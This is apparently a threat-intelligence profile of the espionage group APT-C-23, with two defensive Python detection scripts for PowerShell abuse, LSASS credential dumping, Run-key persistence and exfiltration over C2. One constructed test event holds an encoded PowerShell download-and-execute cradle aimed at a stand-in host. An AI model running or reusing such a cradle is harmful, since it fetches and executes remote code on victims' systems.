Name | APT-C-23
Other names | Arid Viper, Desert Falcons, Two-tailed Scorpion
Date of initial activity | 2013 (see Overview)
Motivation | Cyberwarfare (cyber espionage)
Associated tools | Heliconia, Ophion, Saidot, PowerShell-based tools
Platforms | Windows, Android, iOS
Overview
APT-C-23, also known as Arid Viper, Desert Falcons, or Two-tailed Scorpion, is an Advanced Persistent Threat (APT) group engaged in cyber espionage. Active since at least 2013, it has consistently targeted high-value entities across the Middle East, with a particular focus on Egypt and Palestine. Its operations rely on custom malware and multi-stage delivery chains that combine social engineering with the exploitation of vulnerabilities in popular applications.
APT-C-23's campaigns use multi-stage attack chains and malware customized to each operation's objectives. A representative family is AridSpy, an Android spyware that illustrates the group's approach: it is built to evade detection and to exfiltrate sensitive data from the compromised device. As with its other tools, the group delivers AridSpy by trojanizing legitimate applications and distributing the modified builds through deceptive channels, so that victims install the spyware themselves.
The group's tradecraft has evolved over time, and recent campaigns show it adapting and refining its techniques. Its malware spans Android, iOS, and Windows, which lets it run broad and persistent surveillance operations. The narrow geopolitical focus of its targeting, combined with purpose-built tooling, points to a strategic intelligence-collection mandate and makes it a serious threat to organizations and individuals in the affected regions.
Common Targets
Public Administration
Individuals in Palestine and Egypt
Attack vectors
Phishing
Web browsing (drive-by compromise)
How they work
At the core of APT-C-23's operations are custom remote access tools (RATs) such as Heliconia and Ophion. These give the operators persistent access to compromised hosts, remote control, and broad data collection. Heliconia provides remote command execution, keystroke capture, and file manipulation while evading detection mechanisms; Ophion adds system monitoring, file management, and keylogging, which lets the group gather extensive intelligence from infected machines. Both are engineered to blend in with legitimate system processes, which makes them hard to detect and analyze with conventional, signature-based security solutions.
The group also deploys purpose-built exfiltration tooling to move stolen data from compromised hosts to its command-and-control (C2) infrastructure. Data is sent over encrypted channels and shaped to resemble ordinary network traffic, which reduces the chance of interception and keeps the operation quiet. Because the content is encrypted, defenders are typically left with metadata (destination, timing, and volume) as the main signal of exfiltration.
Alongside custom tools, APT-C-23 uses widely available utilities such as Mimikatz and the Metasploit Framework. Mimikatz dumps credentials (for example, from LSASS process memory) and so supports privilege escalation and lateral movement within a network. Metasploit is used for exploitation and post-exploitation: generating custom payloads, running exploits against additional systems, and establishing footholds in the target environment.
PowerShell-based tools and scripts round out the toolset: PowerShell is used to run commands, automate tasks, and establish persistence. Because it is a signed Microsoft binary that administrators use daily, its execution is not suspicious by itself, and this living-off-the-land approach often bypasses controls that look only for unknown executables. Detection therefore depends on what is run rather than what runs it: command-line logging (including decoding of -EncodedCommand payloads) and PowerShell script block logging are the telemetry sources that expose this activity.
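As an added example (not code from this page or from any APT-C-23 tool), the following Python script runs simple detection logic over constructed Sysmon-style events for three of the behaviours described above: encoded or download-cradle PowerShell command lines (T1059.001), Run-key persistence pointing at a user-writable path (T1547.001), and a process opening LSASS with PROCESS_VM_READ, as Mimikatz does (T1003.001). The event records, file paths, hostname, and access masks are all constructed for illustration; the field names follow Sysmon's Event ID 1, 10, and 13 schemas.

```python
"""Detection checks for three behaviours attributed to APT-C-23 on this page.
Input is a list of constructed Sysmon-style events (not real telemetry):
Event ID 1 = process creation, 13 = registry value set, 10 = process access."""
import base64
import re

# Locations a non-admin user can write to; a Run value pointing here is suspicious.
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\programdata\\", "\\users\\public\\")
RUN_KEY = re.compile(r"\\CurrentVersion\\(Run|RunOnce)\\", re.IGNORECASE)
# PowerShell accepts any unambiguous prefix of -EncodedCommand, so match them all.
ENC_FLAG = re.compile(r"(?:^|\s)[-/](?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})",
                      re.IGNORECASE)
CRADLE = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|Invoke-Expression|"
                    r"\bIEX\b|FromBase64String", re.IGNORECASE)
PROCESS_VM_READ = 0x0010  # access right required to read another process's memory


def encode_ps(script: str) -> str:
    """Encode a script the way -EncodedCommand expects: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample events: two process creations, two registry writes, two LSASS opens.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc "
     + encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://c2.invalid/s.ps1')")},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -Command Get-Service"},
    {"EventID": 13, "Image": r"C:\Users\victim\AppData\Roaming\update.exe",
     "TargetObject": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "Details": r"C:\Users\victim\AppData\Roaming\update.exe"},
    {"EventID": 13, "Image": r"C:\Windows\System32\msiexec.exe",
     "TargetObject": r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     "Details": r"C:\Program Files\Microsoft OneDrive\OneDrive.exe"},
    {"EventID": 10, "SourceImage": r"C:\Users\victim\AppData\Local\Temp\m.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1000"},
]


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload, or None if there is none."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def check_powershell(ev):
    """T1059.001: flag encoded command lines and download/eval cradles."""
    if ev.get("EventID") != 1:
        return None
    cmd = ev.get("CommandLine", "")
    decoded = decode_encoded_command(cmd)
    text = decoded if decoded is not None else cmd  # inspect the decoded script if any
    reasons = []
    if decoded is not None:
        reasons.append("encoded command")
    if CRADLE.search(text):
        reasons.append("download/eval cradle")
    if not reasons:
        return None
    return {"technique": "T1059.001", "reason": ", ".join(reasons), "detail": text}


def check_run_key(ev):
    """T1547.001: Run/RunOnce value whose target lives in a user-writable directory."""
    if ev.get("EventID") != 13 or not RUN_KEY.search(ev.get("TargetObject", "")):
        return None
    target = ev.get("Details", "")
    if not any(p in target.lower() for p in USER_WRITABLE):
        return None  # Run values pointing at Program Files etc. are routine
    return {"technique": "T1547.001", "reason": "Run value points at user-writable path",
            "detail": f"{ev['TargetObject']} -> {target}"}


def check_lsass_access(ev):
    """T1003.001: a process opening lsass.exe with PROCESS_VM_READ."""
    if ev.get("EventID") != 10 or not ev.get("TargetImage", "").lower().endswith("\\lsass.exe"):
        return None
    granted = int(ev.get("GrantedAccess", "0x0"), 16)
    if not granted & PROCESS_VM_READ:
        return None  # query-only handles (e.g. 0x1000) are normal for many agents
    # A production rule would also allow-list AV/EDR images that legitimately read LSASS.
    return {"technique": "T1003.001", "reason": f"PROCESS_VM_READ on lsass (0x{granted:x})",
            "detail": ev.get("SourceImage", "")}


def analyse(events):
    """Run every check over every event and return the list of findings."""
    findings = []
    for ev in events:
        for check in (check_powershell, check_run_key, check_lsass_access):
            hit = check(ev)
            if hit:
                findings.append(hit)
    return findings


if __name__ == "__main__":
    for f in analyse(SAMPLE_EVENTS):
        print(f["technique"], "|", f["reason"], "|", f["detail"])
```

Run as-is and the script reports three findings (the encoded download cradle, the Run value under AppData, and the LSASS open with 0x1010) while leaving the benign Get-Service call, the OneDrive Run value, and the query-only svchost handle alone. The decoding step matters most: an encoded command line carries no keywords a string match could catch until it is decoded from UTF-16LE base64.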
MITRE Tactics and Techniques
Initial Access:
Phishing (T1566): APT-C-23 often uses spear-phishing emails carrying malicious attachments (T1566.001) or links (T1566.002) to gain initial access to targeted systems.
Drive-by Compromise (T1189): They may exploit compromised websites to deliver malicious payloads to visitors.
Execution:
Command and Scripting Interpreter (T1059): APT-C-23 uses scripting languages such as PowerShell (T1059.001) or JavaScript (T1059.007) to execute commands on compromised systems.
Exploitation for Client Execution (T1203): They may use specially crafted files that exploit vulnerabilities in client applications to execute malicious code.
Persistence:
Registry Run Keys / Startup Folder (T1547.001): The group may create or modify registry keys to ensure their malware is executed upon system startup.
Create or Modify System Process (T1543): They might alter system processes or create new ones to maintain persistence on the compromised systems.
Privilege Escalation:
Exploitation for Privilege Escalation (T1068): APT-C-23 exploits vulnerabilities to elevate their privileges within the system.
Abuse Elevation Control Mechanism: Bypass User Account Control (T1548.002): They may use techniques to bypass UAC and gain higher levels of access.
Defense Evasion:
Obfuscated Files or Information (T1027): They use various obfuscation techniques to hide their malicious payloads and activities.
Subvert Trust Controls: Code Signing (T1553.002): The group may use code signing certificates to make their malicious executables appear legitimate.
Credential Access:
OS Credential Dumping (T1003): APT-C-23 may use tools such as Mimikatz to extract credentials from the target system.
Brute Force (T1110): They might employ brute-force techniques to guess passwords and gain unauthorized access.
Discovery:
Network Service Discovery (T1046): The group scans network services to identify potential targets and vulnerabilities.
System Information Discovery (T1082): They gather information about the system to better understand the environment they are operating in.
Lateral Movement:
Remote Services: Remote Desktop Protocol (T1021.001): They may use RDP to move laterally across the network and access other systems.
Remote Services: SMB/Windows Admin Shares (T1021.002): They might utilize administrative shares to move between systems on the network.
Collection:
Data Staged (T1074): APT-C-23 may stage data before exfiltrating it to ensure the exfiltration process is efficient and stealthy.
Screen Capture (T1113): They might capture screenshots to gather sensitive information from the compromised systems.
Exfiltration:
Exfiltration Over Command and Control Channel (T1041): APT-C-23 often exfiltrates data over the same channels used for command and control, avoiding detection.
Impact:
Data Destruction (T1485): In some cases, they might destroy data on compromised systems as part of their operational impact.
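Exfiltration over the C2 channel (T1041, listed above) hides the stolen content inside an encrypted session, so network-side detection has to work from metadata. The following Python script, an added example not taken from this page or from any APT-C-23 tooling, profiles constructed proxy log lines per client/destination pair and flags pairs whose connections are both regularly spaced (beacon-like) and strongly upload-heavy, and it reports the single largest upload relative to the typical beacon size. The IP addresses, timestamps, byte counts, and thresholds are all constructed or assumed for illustration.

```python
"""Metadata-based heuristic for exfiltration over an existing C2 channel (T1041).
Input is a constructed proxy log (not real traffic): one line per connection with
timestamp, client, destination, bytes sent and bytes received."""
from collections import defaultdict
from datetime import datetime
from statistics import mean, median, pstdev

# Constructed log. 203.0.113.7: 5-minute beacon with one large upload (the exfil).
# 192.0.2.10: periodic but download-heavy (an update check). 198.51.100.20: browsing.
PROXY_LOG = """\
2024-05-01T10:00:00 10.0.0.5 203.0.113.7 1200 310
2024-05-01T10:05:01 10.0.0.5 203.0.113.7 1180 298
2024-05-01T10:10:00 10.0.0.5 203.0.113.7 524288 301
2024-05-01T10:15:02 10.0.0.5 203.0.113.7 1210 305
2024-05-01T10:20:00 10.0.0.5 203.0.113.7 1195 300
2024-05-01T10:00:30 10.0.0.5 192.0.2.10 400 5000
2024-05-01T10:05:30 10.0.0.5 192.0.2.10 400 5000
2024-05-01T10:10:30 10.0.0.5 192.0.2.10 400 5000
2024-05-01T10:15:30 10.0.0.5 192.0.2.10 400 5000
2024-05-01T10:02:17 10.0.0.5 198.51.100.20 820 60210
2024-05-01T10:31:44 10.0.0.5 198.51.100.20 900 80100
2024-05-01T10:47:03 10.0.0.5 198.51.100.20 760 120400
"""


def parse_log(text):
    """Parse whitespace-separated log lines into connection records."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, sent, received = line.split()
        records.append({"ts": datetime.fromisoformat(ts), "src": src, "dst": dst,
                        "out": int(sent), "in": int(received)})
    return records


def profile_flows(records):
    """Summarise timing regularity and byte direction per (client, destination) pair."""
    flows = defaultdict(list)
    for r in records:
        flows[(r["src"], r["dst"])].append(r)
    profiles = {}
    for key, recs in flows.items():
        recs.sort(key=lambda r: r["ts"])
        gaps = [(b["ts"] - a["ts"]).total_seconds() for a, b in zip(recs, recs[1:])]
        outs = [r["out"] for r in recs]
        out_total, in_total = sum(outs), sum(r["in"] for r in recs)
        # Coefficient of variation of the inter-connection gap: near 0 means a fixed timer.
        cv = pstdev(gaps) / mean(gaps) if len(gaps) >= 2 and mean(gaps) > 0 else None
        profiles[key] = {
            "count": len(recs),
            "interval_cv": cv,
            "out_total": out_total,
            "in_total": in_total,
            "upload_ratio": out_total / max(in_total, 1),   # >1 means the client mostly sends
            "burst_ratio": max(outs) / max(median(outs), 1),  # largest upload vs typical beacon
        }
    return profiles


def detect_exfil_over_c2(records, min_conns=4, max_cv=0.2, min_upload_ratio=5.0):
    """Flag pairs that are both beacon-like and upload-heavy. Thresholds are assumed."""
    findings = []
    for (src, dst), p in profile_flows(records).items():
        if p["count"] < min_conns or p["interval_cv"] is None:
            continue  # too few samples to judge regularity
        if p["interval_cv"] <= max_cv and p["upload_ratio"] >= min_upload_ratio:
            findings.append({"src": src, "dst": dst, **p})
    return findings


if __name__ == "__main__":
    for f in detect_exfil_over_c2(parse_log(PROXY_LOG)):
        print(f"{f['src']} -> {f['dst']}: {f['count']} conns, interval cv={f['interval_cv']:.3f}, "
              f"upload ratio={f['upload_ratio']:.0f}, burst x{f['burst_ratio']:.0f}")
```

Only 203.0.113.7 is reported: the update check is just as periodic but download-heavy, and the browsing session is neither regular nor frequent enough. Backup agents and cloud sync clients are the usual false positives for this heuristic, so pair it with a destination allow-list before alerting on it.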